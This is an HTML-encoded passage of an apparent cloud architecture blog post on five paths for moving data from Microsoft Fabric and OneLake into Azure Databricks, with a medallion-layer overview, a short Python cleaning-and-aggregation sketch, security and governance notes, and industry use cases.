&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Note: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;This article describes a solution idea. Your cloud architect can use this guidance to help visualize the major components for a typical implementation. Use this article as a starting point to design a well-architected solution that aligns with your workload’s specific requirements.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;As organizations adopt Microsoft Fabric as their unified analytics platform, it has become a leading path for ingesting both streaming and batch data into Azure Databricks. This article covers integration approaches -via Microsoft Fabric- and details the five Fabric-specific paths that connect OneLake/ADLS and Databricks for end-to-end data processing.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Medallion Architecture&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;The following data flow corresponds to the architecture diagram:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;Data is ingested through Microsoft Fabric (via Mirroring, RTI, or Data Factory) lands data into OneLake/ADLS. With the medallion pattern, consisting of Bronze, Silver, and Gold storage layers, organizations have flexible access and extendable data processing:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:0,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Bronze&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Raw data entry point. Data arrives in its source format and is converted to the open, transactional Delta Lake format.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Silver&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Optimized for BI and data science. ETL and stream processing tasks filter, clean, transform, join, and aggregate Bronze data into curated datasets using SQL, Python, R, or Scala.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Gold&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Enriched data ready for analytics and reporting. Analysts use Power BI, PySpark, SQL, or Excel for insights and queries.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
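&lt;P&gt;The three layers above can be illustrated with a minimal, framework-free Python sketch. The sample records, field names, and the helper functions &lt;CODE&gt;to_silver&lt;/CODE&gt; and &lt;CODE&gt;to_gold&lt;/CODE&gt; are assumptions made for illustration only; a real implementation would typically operate on Delta tables in Azure Databricks rather than on in-memory lists.&lt;/P&gt;
&lt;PRE&gt;
```python
from collections import defaultdict

# Hypothetical raw events as they might land in the Bronze layer.
# Field names and values are illustrative assumptions, not from the article.
bronze = [
    {"device": "a", "reading": "21.5"},
    {"device": "a", "reading": "bad"},  # malformed value, dropped in Silver
    {"device": "b", "reading": "19.0"},
    {"device": "a", "reading": "22.5"},
]


def parse_reading(text):
    """Return the reading as a float, or None if it cannot be parsed."""
    try:
        return float(text)
    except ValueError:
        return None


def to_silver(rows):
    """Clean and type the raw rows, dropping records that fail parsing."""
    cleaned = []
    for row in rows:
        value = parse_reading(row["reading"])
        if value is not None:
            cleaned.append({"device": row["device"], "reading": value})
    return cleaned


def to_gold(rows):
    """Aggregate cleaned rows into a per-device average for reporting."""
    readings = defaultdict(list)
    for row in rows:
        readings[row["device"]].append(row["reading"])
    return {device: sum(vals) / len(vals) for device, vals in readings.items()}


silver = to_silver(bronze)
gold = to_gold(silver)
print(gold)
```
&lt;/PRE&gt;
&lt;P&gt;Keeping each layer as a separate step means the raw Bronze data stays untouched, so Silver and Gold outputs can be rebuilt if cleaning or aggregation rules change.&lt;/P&gt;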
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Fabric Integration Paths&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;img&gt;&lt;SPAN data-contrast="auto"&gt;Figure: Five Microsoft Fabric integration paths into Azure Databricks&lt;/SPAN&gt;&lt;/img&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;SPAN data-contrast="none"&gt;&lt;STRONG&gt;Note: &lt;/STRONG&gt;&lt;/SPAN&gt;&lt;SPAN data-contrast="none"&gt;This architecture establishes a complete loop-back between Microsoft Fabric and Azure Databricks, enabling Gold layer tables to be seamlessly mirrored back to Microsoft Fabric for dashboarding through Azure Databricks Mirroring.&lt;/SPAN&gt; &lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:120,&amp;quot;335559739&amp;quot;:0}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H4&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;The following five paths connect Microsoft Fabric to Azure Databricks:&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric Mirroring to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt; – A low-cost, low-latency turnkey solution that creates a replica of data from operational sources (SQL Server, Azure Cosmos DB, Oracle) in OneLake. Handles the initial load and ongoing CDC changes automatically, keeping data continuously up to date.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric RTI to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Fabric Real-Time Intelligence ingests streaming event data into OneLake with sub-second latency, enabling real-time analytics on live event streams.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Fabric Data Factory to OneLake&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt; – Orchestrates ingestion from diverse sources not covered by Mirroring (such as Sybase or REST APIs) and lands data in OneLake, ensuring complete source coverage.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;OneLake to Azure Databricks&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Unity Catalog connections to OneLake, secured via Managed Identities from Microsoft Entra ID, allow Databricks to query OneLake data items as a native catalog without data duplication.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt;Fabric Data Factory to Azure Databricks (direct&lt;/STRONG&gt;)&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; – Orchestrates ingestion from diverse sources directly into Azure Data Lake Storage (ADLS), where Azure Databricks picks up the data for medallion architecture processing.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/OL&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Requirement-Specific Notes&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Data Ingestion&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft Fabric Mirroring currently supports SQL Server, Azure Cosmos DB, and Oracle as source systems. For sources not yet supported by Mirroring—such as Sybase or REST APIs—use Fabric Data Factory pipelines to ensure full coverage across all data systems.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Once data is in the landing zone with the correct format, Mirroring’s CDC replication starts automatically and manages the complexity of merging changes (updates, inserts, and deletes) into Delta tables, keeping data in Fabric continuously up to date. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/mirroring/overview#how-does-open-mirroring-work" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about open mirroring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Storage Format and Time Travel&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;OneLake supports Delta tables, enabling schema evolution and time travel across all data stored in the lakehouse. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/lakehouse-and-delta-tables" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about OneLake and Delta tables&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Security&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Encryption at rest: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;OneLake automatically encrypts all data at rest using Microsoft-managed keys, compliant with FIPS 140-2 standards. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/onelake/security/get-started-security#data-at-rest" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt;Encryption in transit:&lt;/STRONG&gt; &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;All data in transit is encrypted using TLS 1.2 or higher, securing data movement between Fabric, OneLake, and Azure Databricks. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/onelake/security/get-started-security#data-in-transit" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Data Governance&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;OneLake can be registered and scanned by Microsoft Purview, enabling cataloging of stored metadata and data quality profiling. This protects sensitive information, including PHI and PII, across ingestion and analytics workflows. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/purview/unified-catalog-data-quality-fabric-lakehouse" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about Purview with Fabric Lakehouse&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-30px" aria-level="3"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Operations and Monitoring&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:200,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P class="lia-indent-padding-left-60px"&gt;&lt;SPAN data-contrast="auto"&gt;Use the Fabric monitor hub to track pipeline health, Spark application performance, and ingestion job status across all Fabric workloads. &lt;/SPAN&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/browse-spark-applications-monitoring-hub" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Learn more about the Fabric monitor hub&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Scenario Details&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;P class="lia-indent-padding-left-30px"&gt;&lt;SPAN data-contrast="auto"&gt;This architecture applies to any organization that needs to unify streaming and batch data at scale. Common characteristics include:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559738&amp;quot;:80,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Multiple operational data sources (databases, SaaS applications, event streams)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;A requirement to process both real-time and historical data in the same platform&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Governance and compliance requirements for sensitive data (PHI, PII, financial records)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;SPAN data-contrast="auto"&gt;Analytics consumers spanning BI (Power BI), data science (Databricks notebooks), and ML workloads&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 aria-level="3"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Potential Use Cases&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Healthcare and life sciences&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– PHI/PII protection via Purview; real-time patient telemetry + batch EHR analytics&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Financial services&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Real-time fraud detection streams + batch regulatory reporting&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Retail and e-commerce&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– Streaming clickstream analytics + batch inventory and supply chain processing&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Energy and utilities&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;– IoT sensor telemetry streaming + batch consumption analytics&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 aria-level="2"&gt;&lt;SPAN class="lia-text-color-15"&gt;&lt;STRONG&gt;Next Steps&amp;nbsp;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H4&gt;
&lt;UL&gt;
